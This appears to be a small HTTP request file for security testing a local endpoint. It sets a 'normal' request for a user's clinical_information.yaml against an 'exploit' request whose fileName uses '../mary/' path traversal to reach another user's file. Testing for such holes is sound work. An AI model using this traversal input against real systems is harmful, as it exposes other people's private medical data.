# normal
GET http://localhost:3000/test072 HTTP/1.1
content-type: application/json

{
  "user": "jane",
  "payload": "malbec",
  "fileName": "clinical_information.yaml"
}

###
# exploit
GET http://localhost:3000/test072 HTTP/1.1
Content-Type: application/json

{
  "user": "jane",
  "payload": "malbec",
  "fileName": "../mary/clinical_information.yaml"
}
